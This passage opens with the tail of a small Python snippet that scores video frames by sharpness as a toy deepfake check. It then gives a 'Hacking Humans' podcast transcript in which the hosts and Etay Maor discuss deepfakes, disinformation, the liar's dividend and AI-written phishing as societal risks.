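    real detectors use trained models rather than this single statistic."""
    cap = cv2.VideoCapture(video_path)
    scores = []
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        scores.append(cv2.Laplacian(gray, cv2.CV_64F).var())
    cap.release()
    return scores

scores = frame_scores("suspect_clip.mp4")  # hypothetical input file
print(max(scores) - min(scores) if scores else "no frames read")
```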
Etay Maor: But I have to say this. One of the things that really bothers me about all this is that a lot of times, the victims, so to speak, don't want to be convinced that it's fake. If this is just being used as an echo chamber for extremist groups or for propaganda or, you know, conspiracy theories, then for those types of recipients of the media, it's, hey, I've seen this person say it - that's it. It's true.
Dave Bittner: Right.
Etay Maor: And we don't even have to go as far as deepfakes, right? Because when you talk about mis- and disinformation, there are all kinds of levels to it, from missing context to deceptive editing. We saw this example this week, right? I think it was the women's soccer team. There were reports that they were not looking at or giving respect to the national anthem. And there was a video of it, and I saw it, and it really looks convincing. But if you add the context that some of them were looking at the flag while some were looking at the veteran who was playing the music, then you see that actually there was nothing there. They all respected the flag and the anthem.
Dave Bittner: Right.
Etay Maor: But for those who are receiving this and want - they hear what they want to hear, it doesn't matter at that point.
Dave Bittner: Interesting times ahead, yes?
Etay Maor: Definitely. And again, with the whole idea of the liar's dividend - well, not an idea; it's a fact - and with these technologies, it's going to be really interesting how you distinguish reality from something that was made up. And, you know, do people even care at some point?
Dave Bittner: All right, Joe, what do you think?
Joe Carrigan: Dave, deepfakes are something that are on the horizon.
Dave Bittner: Yep.
Joe Carrigan: ...Like, credible deepfakes. And I'm not talking like on the horizon like fusion power is on the horizon, right? That's...
Dave Bittner: Right.
Joe Carrigan: That's always 10 years away. These things are going to be here soon.
Dave Bittner: Yeah.
Joe Carrigan: And Etay does talk about the FBI warning throughout this interview. The fact that the FBI feels it necessary to actually release a warning is something I think we should all be paying attention to. You brought up some good points that there are some really good, legitimate use cases for this technology, like dubbing movies.
Dave Bittner: Yeah.
Joe Carrigan: You know, that would keep me from having to read subtitles and missing the action of the movie, right? Etay says he has zero doubt that this is going to be used politically. I would say it this way. I am 100% certain that this will be used politically in the future.
Dave Bittner: Yeah.
Joe Carrigan: I have never been more certain of anything in my life.
Dave Bittner: (Laughter).
Joe Carrigan: This will happen in the next election cycle.
Dave Bittner: Right. Yeah.
Joe Carrigan: There will be tons of deepfakes coming out soon with this election cycle.
Dave Bittner: Yeah.
Joe Carrigan: And some of them are going to be funny. Some of them are going to be really, really scary and deceiving. One thing that Etay brings up that I think has a great name - he calls it the liar's dividend. That is a huge consequence of this technology. That is something that's going to change the landscape, and we're going to have to have a way of discerning whether a video is real or fake. I mean, every now and then - I can't think of a specific example - we've had something where somebody tweets something inappropriate, let's say.
Dave Bittner: Yeah.
Joe Carrigan: And then they say, oh, my account was hacked. And, of course, Twitter gets on and looks at it and says, well, no, we didn't see any unusual activity. And the person confesses, oh, yes, that was me.
Dave Bittner: Right.
Joe Carrigan: Right?
Dave Bittner: Right.
Joe Carrigan: This is going to be like that on steroids, right? Etay talks about GPT-3, which is the OpenAI product. Microsoft actually owns an exclusive license to it, but you can still use the API - you can pay OpenAI to use it.
Dave Bittner: Right.
Joe Carrigan: He makes a very important point that I wanted to highlight. All the information we put on social media can be fed into this model. This model has billions of inputs, and it can spit out a conversation opener that is more likely to catch your interest. And we talked about this recently as well - I can't remember if it was on "Hacking Humans" or on the CyberWire Daily show - about the guys, I think they were from Singapore, who used this exact model, OpenAI's GPT-3, to generate phishing emails and found that the model was more effective at writing phishing emails than they were, tested against people they knew...
Dave Bittner: Right. Right.
Joe Carrigan: ...Which is remarkable. And they said more study needs to be done on that, and I agree. But they presented that at DEF CON...
Dave Bittner: Yeah, yeah.
Joe Carrigan: ...This year, just recently. We do need to be aware that this stuff is out there and who has access to it. But unfortunately, who has access to it is just about anybody that wants it. The OpenAI product is available to anybody that wants to utilize it via the API. There are tons of other products out there that will let you generate deepfake speech. And in fact, we were talking a week or two ago about deepfake video services that are out there now...
Dave Bittner: Right. Yeah.
Joe Carrigan: ...That make customizable videos. These things are available to anybody who has the money to pay for them. So...
Dave Bittner: And it's not expensive.
Joe Carrigan: And it's not expensive - exactly.
Dave Bittner: Yeah.
Joe Carrigan: There are artifacts that are evidence of deepfakes, but those are going to become smaller and smaller and smaller.
Dave Bittner: Right.
Joe Carrigan: This is going to be an arms race of detecting these deepfakes. And the bigger problem is the humans. There are some people you'll show these deepfakes to. You may even tell them that they're deepfakes when you're showing it to them, but they're still going to believe them...
Dave Bittner: Yeah.
Joe Carrigan: ...Because of their belief set.
Dave Bittner: Right, right. Yeah. I remember - there's a saying, I think, sort of in the skeptical world. You know, there's that old saying, I'll believe it when I see it. And the inverse of that is I'll see it when I believe it.
Joe Carrigan: Right (laughter).
Dave Bittner: And I think there's something to that with this.
Joe Carrigan: Yeah.
Dave Bittner: I just - you know, I think this adds an overlay of anxiety of, who do we trust?
Joe Carrigan: It does.
Dave Bittner: Right? We can't trust our own eyes. And I think it chips away at the sources of authority in our lives because if anybody can say, oh, that news clip was probably just a deepfake...
Joe Carrigan: Right.
Dave Bittner: ...It makes it very easy to dismiss things, to sort of hand-wave away. You know, and I think that's a problem that's been growing lately. You know, it's like, well, sure, you're a doctor, but I do my own research.
Joe Carrigan: Right (laughter).
Dave Bittner: You know? Oh, OK.
Joe Carrigan: Right.
Dave Bittner: We need - a functioning society needs trusted experts.
Joe Carrigan: Yes.
Dave Bittner: Right?
Joe Carrigan: I would agree.
Dave Bittner: And if we chip away at people's confidence in those experts - which is not to say that they can't be challenged or questioned or anything like that. All those things come with expertise. But at the same time, we have to have ways of establishing what is ground truth.
Joe Carrigan: Right.
Dave Bittner: And I think things like this chip away at that, and that concerns me, I think. And it sounds like it concerns you, too.
Joe Carrigan: It does very much so.
Dave Bittner: Yeah. All right. Well, our thanks to Etay Maor for joining us. We do appreciate him taking the time.
Dave Bittner: That is our show. We want to thank all of you for listening. And, of course, we want to thank the Johns Hopkins University Information Security Institute for their participation. You can learn more at isi.jhu.edu. The "Hacking Humans" podcast is proudly produced in Maryland at the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technologies. Our senior producer is Jennifer Eiben. Our executive editor is Peter Kilpe. I'm Dave Bittner.
Joe Carrigan: And I'm Joe Carrigan.
Dave Bittner: Thanks for listening.